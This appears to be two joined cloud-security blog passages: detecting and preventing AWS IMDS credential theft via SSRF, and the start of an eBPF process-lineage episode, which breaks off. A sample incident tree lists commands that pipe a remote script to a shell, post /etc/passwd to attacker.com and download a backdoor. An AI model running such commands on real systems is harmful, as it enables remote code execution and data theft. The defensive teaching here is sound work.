The IMDS credential theft itself is silent — there is no CloudTrail event for an IMDS GET request. The attacker’s use of the stolen credentials is what generates logs. The key signal is GetCallerIdentity from an unusual source IP paired with the instance role’s ARN appearing in CloudTrail from an IP that is not the instance itself.

# Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE="MyApplicationRole"
# The address CloudTrail normally records for this instance
# (its public or NAT IP, or its private IP when calls go through a VPC endpoint)
INSTANCE_IP="10.0.1.50"

# Each CloudTrailEvent is a JSON-encoded string, so emit JSON and decode it with fromjson
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].CloudTrailEvent' \
  --output json | \
  jq --arg role "${DETECTOR_ROLE}" --arg ip "${INSTANCE_IP}" '
    .[] | fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == $role) |
    select(.sourceIPAddress != $ip) |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }'
  # Any result here = role credentials being used from outside the instance

The tell: the userIdentity.arn will contain the instance ID as the role session name (e.g., assumed-role/MyApplicationRole/i-01234567890abcdef0). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.
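That rule is easy to express as a predicate over CloudTrail records. A minimal Python sketch, assuming records have already been decoded into dictionaries; the function name, the sample records, and the 198.51.100.23 address (a documentation range) are hypothetical.

```python
import re

# Instance-role sessions use the instance ID as the role session name.
INSTANCE_SESSION_ARN = re.compile(
    r"^arn:aws:sts::\d{12}:assumed-role/(?P<role>[^/]+)/(?P<instance>i-[0-9a-f]+)$"
)


def is_exfiltrated_instance_credential(event, expected_ips):
    """Flag a record where an instance-role session calls from an unexpected IP."""
    arn = event.get("userIdentity", {}).get("arn", "")
    if not INSTANCE_SESSION_ARN.match(arn):
        return False  # not an EC2 instance-role session
    return event.get("sourceIPAddress") not in expected_ips


# Hypothetical records: the same role session seen from two source addresses.
SESSION = "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0"
from_instance = {"userIdentity": {"arn": SESSION}, "sourceIPAddress": "10.0.1.50"}
from_outside = {"userIdentity": {"arn": SESSION}, "sourceIPAddress": "198.51.100.23"}

print(is_exfiltrated_instance_credential(from_instance, {"10.0.1.50"}))
print(is_exfiltrated_instance_credential(from_outside, {"10.0.1.50"}))
```

In practice the expected set has to include every address the instance legitimately egresses from, and calls that AWS services make on the role's behalf record a service name instead of an IP, so a real rule needs an allowlist for those as well.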

GuardDuty: The Purpose-Built Finding

GuardDuty has a specific finding for exactly this scenario:

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS

This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely, meaning someone has exfiltrated the credentials to their own system and is using them from there.

# Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.AwsApiCallAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
    lastSeen: .Service.EventLastSeen
  }'

A second finding to watch:

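Recon:IAMUser/UserPermissions fires when the stolen credentials are used to enumerate IAM permissions (the iam:SimulatePrincipalPolicy call from the attacker’s Step 4 above). Current GuardDuty releases report this behavior as Discovery:IAMUser/AnomalousBehavior, which replaced the retired Recon finding. It often appears immediately before the data exfiltration events.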

VPC Flow Logs: Connections to 169.254.169.254

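VPC Flow Logs do not record traffic to the IMDS endpoint: AWS documents traffic to and from 169.254.169.254 as excluded from flow logs. What they do capture is egress from EC2 instances, which can reveal post-exploitation activity. The query below is still worth keeping as a check in containerized environments, but expect it to return no rows in a standard VPC, and rely on host-level telemetry to see which source IPs actually call IMDS: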

# Athena query against VPC flow logs
# Find: connections to 169.254.169.254 from unexpected source IPs
# (useful in containerized environments where only the instance itself should call IMDS)

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = '169.254.169.254'
  AND action = 'ACCEPT'
  AND from_unixtime(start) > current_timestamp - interval '24' hour
ORDER BY start_time DESC;

An empty result here is expected, since flow logs do not record metadata traffic, so it is not proof that nothing called IMDS. If host-level telemetry shows callers that are not your EC2 instance’s primary private IP (for example, container IPs within the pod CIDR) and you have --http-put-response-hop-limit 1 set, those token requests should be failing. If they’re succeeding, the hop limit is not enforced.

IMDSv2 Hop Limit: Why It Blocks Containerized Attacks

The hop limit is a separate defense from the token requirement. With --http-put-response-hop-limit 1, IMDS sends the response to the token PUT (the packet that carries the IMDSv2 token) with an IP TTL of 1. When a process running inside a container requests a token, that response must travel back across:

Hypervisor IMDS endpoint → host network namespace → veth pair → container network namespace

The extra forwarding hop decrements the TTL to 0, and the response is dropped before it reaches the container. The container never receives a token. The GET request that follows has no token and, if --http-tokens required is also set, is rejected.

Hop limit = 1:
  IMDS → host → [TTL=0, response dropped before the veth]
  Container never receives the token

Hop limit = 2 (required when pods must reach IMDS, e.g. on EKS):
  IMDS → host → veth → container
  Token is delivered; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS

For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via OIDC workload identity: pods get short-lived tokens scoped to their service account, not the node’s IAM role.
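The hop-limit arithmetic can be checked with a toy model. This is a sketch under a simplifying assumption: the packet subject to the hop limit starts with TTL equal to the configured value, and every forwarding step between IMDS and the caller decrements it by one. The function and constant names are illustrative.

```python
def token_delivered(hop_limit, forwarding_hops):
    """True if a packet sent with TTL=hop_limit survives `forwarding_hops` forwards."""
    ttl = hop_limit
    for _ in range(forwarding_hops):
        ttl -= 1
        if ttl <= 0:
            return False  # the forwarding hop drops the packet
    return True


HOST_PROCESS = 0        # caller in the host network namespace: nothing forwards
BRIDGED_CONTAINER = 1   # caller behind a veth/bridge: the host forwards once

for limit in (1, 2):
    print(limit,
          token_delivered(limit, HOST_PROCESS),
          token_delivered(limit, BRIDGED_CONTAINER))
```

Containers that share the host network namespace (hostNetwork: true) sit in the HOST_PROCESS case, so hop limit 1 does not protect against them.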

Purple Phase: Structural Fixes

Fix 1: Enforce IMDSv2 — The Non-Negotiable Control

This is not optional. Every EC2 instance running production workloads should have --http-tokens required. The operational cost is near zero, and it closes the SSRF-to-IMDS credential chain for the common case where the attacker controls only the URL of a GET request.

# Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
# "HttpTokens": "required" confirms IMDSv2 is enforced

# Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version '$Latest' \
  --launch-template-data '{
    "MetadataOptions": {
      "HttpTokens": "required",
      "HttpPutResponseHopLimit": 1,
      "HttpEndpoint": "enabled"
    }
  }'

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version '$Latest'

# Bulk remediation: enforce IMDSv2 on all instances in a region where
# HttpTokens is currently "optional"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[] | [?MetadataOptions.HttpTokens==`optional`].InstanceId' \
  --output text | \
  tr '\t' '\n' | \
  while read -r instance_id; do
    # Skip blank lines so an empty result never calls the API with no instance ID
    [ -n "$instance_id" ] || continue
    echo "Enforcing IMDSv2 on: $instance_id"
    aws ec2 modify-instance-metadata-options \
      --instance-id "$instance_id" \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done

Fix 2: SCP to Block IMDSv1 Org-Wide

An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can’t accidentally revert it.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RequireIMDSv2OnNewInstances",
      "Effect": "Deny",
      "Action": "ec2:RunInstances",
      "Resource": "arn:aws:ec2:*:*:instance/*",
      "Condition": {
        "StringNotEquals": {
          "ec2:MetadataHttpTokens": "required"
        }
      }
    },
    {
      "Sid": "DenyIMDSv1ReEnablement",
      "Effect": "Deny",
      "Action": "ec2:ModifyInstanceMetadataOptions",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "ec2:MetadataHttpTokens": "optional"
        }
      }
    }
  ]
}

Apply this SCP to all OUs except the management account. New ec2:RunInstances calls that don’t include MetadataOptions.HttpTokens=required will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.
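The first statement works because of how negated condition operators treat a missing key. A simplified Python model of that evaluation (an illustration of the rule, not the IAM policy engine; the function names are assumptions):

```python
def string_not_equals(context, key, expected):
    """IAM-style StringNotEquals: a key absent from the request also counts as 'not equal'."""
    return context.get(key) != expected


def run_instances_denied(request_context):
    """Apply the RequireIMDSv2OnNewInstances condition to one request context."""
    return string_not_equals(request_context, "ec2:MetadataHttpTokens", "required")


print(run_instances_denied({}))                                      # launch omits MetadataOptions
print(run_instances_denied({"ec2:MetadataHttpTokens": "optional"}))  # explicit IMDSv1 opt-in
print(run_instances_denied({"ec2:MetadataHttpTokens": "required"}))  # compliant launch
```

The first case is the one that catches teams by surprise: a launch that says nothing about metadata options is denied, so every launch template and automation path has to set HttpTokens explicitly.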

Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely

Enforcing IMDSv2 removes the SSRF-to-IMDS path. OIDC workload identity removes the credential from the picture entirely: no application-scoped IAM role credential is attached to the instance, so there is nothing useful for SSRF to retrieve.

For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod’s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node’s instance profile requires no IAM permissions for application workloads.

# EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials

Fix 4: Restrict SSRF at the Network and Application Layer

IMDSv2 enforcement is the primary control. Defence in depth adds:

# WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name "BlockSSRFToIMDS" \
  --scope REGIONAL \
  --capacity 10 \
  --rules '[
    {
      "Name": "BlockIMDSAccess",
      "Priority": 0,
      "Statement": {
        "ByteMatchStatement": {
          "SearchString": "169.254.169.254",
          "FieldToMatch": {"QueryString": {}},
          "TextTransformations": [{"Priority": 0, "Type": "NONE"}],
          "PositionalConstraint": "CONTAINS"
        }
      },
      "Action": {"Block": {}},
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "BlockIMDSAccess"
      }
    }
  ]' \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS

# Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance's AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly

Note: iptables-based egress filtering is a secondary control. A root process, or any process with CAP_NET_ADMIN, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.
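At the application layer, the equivalent control is to validate a user-supplied URL before the server fetches it. A minimal Python sketch using only the standard library; the function names are assumptions, and the injectable `resolver` parameter exists so the check can be exercised without real DNS.

```python
import ipaddress
import socket
from urllib.parse import urlparse


def is_internal_address(ip_text):
    """True for link-local, private, loopback and other non-public addresses."""
    ip = ipaddress.ip_address(ip_text.split("%")[0])  # drop any IPv6 zone suffix
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # treat ::ffff:169.254.169.254 like 169.254.169.254
    return (ip.is_link_local or ip.is_private or ip.is_loopback
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_safe_fetch_target(url, resolver=socket.getaddrinfo):
    """Allow only http(s) URLs whose host resolves exclusively to public addresses."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = resolver(parsed.hostname, parsed.port or 80)
    except OSError:  # includes socket.gaierror
        return False
    addresses = {info[4][0] for info in infos}
    return bool(addresses) and not any(is_internal_address(a) for a in addresses)


print(is_internal_address("169.254.169.254"))
print(is_safe_fetch_target("file:///etc/passwd"))
```

A check like this is only as good as the fetch that follows it: the HTTP client should connect to the address that was validated and refuse redirects, otherwise DNS rebinding or a redirect to 169.254.169.254 sidesteps it.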

⚠ Production Gotchas

Legacy AWS SDK versions that only support IMDSv1. Older releases of the AWS SDK for Java v1 (< 1.11.678) and of boto3 (< 1.12.6, the minimum listed in AWS’s IMDSv2 transition guide) do not support IMDSv2. Enforcing --http-tokens required on an instance running a legacy SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule ec2-imdsv2-check flags non-compliant instances but does not check SDK versions, so that inventory step is manual.

# Check boto3 version on an instance
python3 -c "import boto3; print(boto3.__version__)"
# Requires >= 1.12.6 for IMDSv2 support

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name "aws-java-sdk-core-*.jar" 2>/dev/null | \
  while read jar; do
    unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | grep "Implementation-Version"
  done
# AWS SDK for Java v1 < 1.11.678 does not support IMDSv2 by default
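Version strings have to be compared numerically, not as text, or 1.11.99 will look newer than 1.11.678. A small Python sketch of that comparison; the helper names are illustrative, and the minimum version is passed in rather than hard-coded so the same check works for any SDK.

```python
import re


def parse_version(text):
    """Turn '1.11.678' into (1, 11, 678), ignoring a suffix such as '-SNAPSHOT'."""
    return tuple(int(part) for part in re.findall(r"\d+", text.split("-")[0]))


def meets_minimum(installed, minimum):
    """Numeric, component-wise comparison of dotted version strings."""
    return parse_version(installed) >= parse_version(minimum)


# Java SDK v1 example, using the minimum quoted above
print(meets_minimum("1.11.99", "1.11.678"))
print(meets_minimum("1.11.700", "1.11.678"))
```

Feeding this from the jar manifest or `boto3.__version__` output turns the manual inventory step into something a fleet-wide script can report on.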

EKS node groups and hop limit 2. If you run EKS and pods use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS; they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. EKS managed node groups default to hop limit 2 for this reason; you can reduce it once you’ve confirmed nothing breaks.

GuardDuty’s 5–15 minute detection delay. UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.

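# EventBridge rule: alert immediately on S3 GetObject data events made with the instance role
# (complements GuardDuty's delayed finding; requires a CloudTrail trail with S3 data events enabled)
# As written it matches every GetObject by the role; add a sourceIPAddress filter to narrow it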
aws events put-rule \
  --name "S3DataEventFromUnexpectedSource" \
  --event-pattern '{
    "source": ["aws.s3"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
      "eventSource": ["s3.amazonaws.com"],
      "eventName": ["GetObject"],
      "userIdentity": {
        "sessionContext": {
          "sessionIssuer": {
            "userName": ["MyApplicationRole"]
          }
        }
      }
    }
  }' \
  --state ENABLED

Disabling the IMDS endpoint entirely. You can set --http-endpoint disabled to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that use OIDC/IRSA and have no SDK calls to IMDS are candidates for full endpoint disablement.

Quick Reference

IMDSv1 vs IMDSv2

Attribute	IMDSv1	IMDSv2
Authentication	None — any HTTP GET works	PUT to `/latest/api/token` required first to obtain a session token
SSRF exploitable	Yes — one HTTP request returns credentials	No — SSRF cannot initiate a PUT before a GET in standard flows
Session token TTL	N/A	1 second to 21,600 seconds (configurable)
Hop limit enforcement	N/A	Applied to the PUT response: hop limit 1 keeps the token from reaching bridged containers
AWS CLI enforcement	`--http-tokens optional` (default on old instances)	`--http-tokens required`
Capital One risk	Present	Eliminated
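The two-step IMDSv2 flow in the table can be sketched with the Python standard library. The header names and the /latest/api/token path are the documented IMDSv2 ones; the function names are assumptions, and `read_metadata` only works when run on an EC2 instance.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def build_token_request(ttl_seconds=21600):
    """Step 1: a PUT that asks IMDS for a session token."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def build_metadata_request(path, token):
    """Step 2: a GET that presents the session token in a header."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )


def read_metadata(path, timeout=2):
    """Run both steps against the real endpoint (EC2 only)."""
    with urllib.request.urlopen(build_token_request(), timeout=timeout) as resp:
        token = resp.read().decode()
    with urllib.request.urlopen(build_metadata_request(path, token), timeout=timeout) as resp:
        return resp.read().decode()


print(build_token_request().get_method())
```

An SSRF that only lets the attacker choose the URL of a GET request can perform neither step: it cannot change the method to PUT and it cannot attach the token header.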

IMDSv2 Enforcement Commands by Provider

Provider	Enforcement Command	Scope
AWS — running instance	`aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1`	Single instance
AWS — launch template	Add `"MetadataOptions": {"HttpTokens": "required"}` to launch template data	All instances from template
AWS — org SCP	Deny `ec2:RunInstances` where `ec2:MetadataHttpTokens != required`	All accounts in org
AWS — Config rule	`ec2-imdsv2-check` managed rule	Compliance audit
GCP	GCP does not have an unauthenticated IMDS equivalent; Metadata Server requires `Metadata-Flavor: Google` header — this header cannot be set via SSRF in most frameworks	N/A
Azure	Azure IMDS requires `Metadata: true` header — browser/SSRF requests typically cannot set this; additionally, IMDS returns only non-credential metadata by default (credentials via Managed Identity have their own endpoint with additional controls)	N/A

Note on GCP and Azure: Both providers designed their metadata services with SSRF resistance in mind. The Metadata-Flavor: Google and Metadata: true headers must be explicitly set by the calling code — they are not added by default browser or curl requests. This does not make SSRF harmless on GCP/Azure (other metadata is still exposed), but the credential exfiltration path is harder than IMDSv1.
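What "must be explicitly set by the calling code" looks like in practice, as a Python sketch. The endpoints and header names are the documented GCP and Azure ones; the function names and the default `resource` value are assumptions for illustration, and nothing here is sent over the network.

```python
import urllib.request
from urllib.parse import urlencode


def gcp_token_request():
    """GCP metadata server: rejected without the Metadata-Flavor header."""
    return urllib.request.Request(
        "http://metadata.google.internal/computeMetadata/v1/"
        "instance/service-accounts/default/token",
        headers={"Metadata-Flavor": "Google"},
    )


def azure_token_request(resource="https://management.azure.com/"):
    """Azure IMDS managed-identity endpoint: rejected without Metadata: true."""
    query = urlencode({"api-version": "2018-02-01", "resource": resource})
    return urllib.request.Request(
        f"http://169.254.169.254/metadata/identity/oauth2/token?{query}",
        headers={"Metadata": "true"},
    )


# A URL-only fetch, which is all a typical SSRF controls, carries neither header.
url_only = urllib.request.Request(gcp_token_request().full_url)
print(url_only.header_items())
```

The protection disappears as soon as the vulnerable feature lets the attacker set request headers, which is why both providers still treat SSRF as a credential risk.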

Key Takeaways

IMDSv1 has no authentication: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required
The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale
--http-tokens required is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable
GuardDuty’s UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting
The structural solution eliminates the credential entirely: OIDC workload identity on EKS/GKE means pods get scoped, short-lived tokens; the node’s instance role carries no application permissions; even a successful SSRF-to-IMDS attack yields nothing useful

What’s Next

SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn’t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: hostPID, hostNetwork, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.


Process Lineage — Reconstructing What Happened After the Fact

July 6, 2026 · June 18, 2026 by Vamshi Krishna Santhapuri

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon · Process Lineage

TL;DR

Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
(kprobe on fork/exec = an eBPF program that fires every time the kernel’s fork() or execve() system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)
Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream
Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node — verify exec tracing is available
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}
interval:s:10 { exit(); }'

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy

# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output:

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc/<pid>/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.
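The /proc/<pid>/cgroup mapping step can be sketched in Python. This assumes the two common kubelet layouts (systemd-style slices with underscores in the pod UID, cgroupfs-style paths with dashes); the function name and the sample lines are illustrative.

```python
import re

# Pod UIDs appear as "pod<uuid>", with "_" instead of "-" under the systemd cgroup driver.
POD_UID = re.compile(
    r"pod([0-9a-f]{8}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{12})"
)


def pod_uid_from_cgroup(cgroup_text):
    """Return the pod UID found in /proc/<pid>/cgroup content, or None for non-pod processes."""
    for line in cgroup_text.splitlines():
        match = POD_UID.search(line)
        if match:
            return match.group(1).replace("_", "-")
    return None


systemd_style = (
    "0::/kubepods.slice/kubepods-burstable.slice/"
    "kubepods-burstable-pod1a2b3c4d_5e6f_7a8b_9c0d_1e2f3a4b5c6d.slice/"
    "cri-containerd-abc123.scope"
)
print(pod_uid_from_cgroup(systemd_style))
print(pod_uid_from_cgroup("0::/system.slice/sshd.service"))
```

The UID still has to be resolved to a pod name and namespace through the Kubernetes API, and that lookup fails once the pod has been deleted, which is the practical argument for enrichment at capture time.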

A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              ├── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
              └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.

How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (execute-permission and capability checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. Leaves the PID unchanged: execve replaces the process image but not the process identity

This fork → exec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.
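The claim that the PID survives execve is easy to check from userspace. The following Python sketch is an illustration only, not part of the eBPF tooling: it forks a child, has the child exec /bin/sh, and compares the PID the shell reports with the PID that fork() returned to the parent. It assumes a Linux host with /bin/sh available, and the function name is made up for this example.

```python
import os


def pid_survives_exec() -> bool:
    """Fork, exec /bin/sh in the child, and compare PIDs across the exec."""
    read_fd, write_fd = os.pipe()
    child_pid = os.fork()  # parent receives the child's PID, child receives 0
    if child_pid == 0:
        # Child: route stdout into the pipe, then replace the process image.
        try:
            os.close(read_fd)
            os.dup2(write_fd, 1)
            # $$ expands to the PID of the shell that execv() turns us into.
            os.execv("/bin/sh", ["sh", "-c", "echo $$"])
        finally:
            os._exit(127)  # reached only if the exec failed
    # Parent: read what the exec'd shell printed, then reap the child.
    os.close(write_fd)
    with os.fdopen(read_fd) as pipe:
        reported = pipe.read().strip()
    os.waitpid(child_pid, 0)
    return reported.isdigit() and int(reported) == child_pid


if __name__ == "__main__":
    print("PID unchanged across execve:", pid_survives_exec())
```

The shell started life as a copy of the Python interpreter, yet it reports the same PID the parent got back from fork(). That is why a fork event and the exec event that follows it can be joined on PID.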

Building the Process Tree with Tracepoints

The two core hooks for process lineage:

# Every fork — capture parent/child relationship
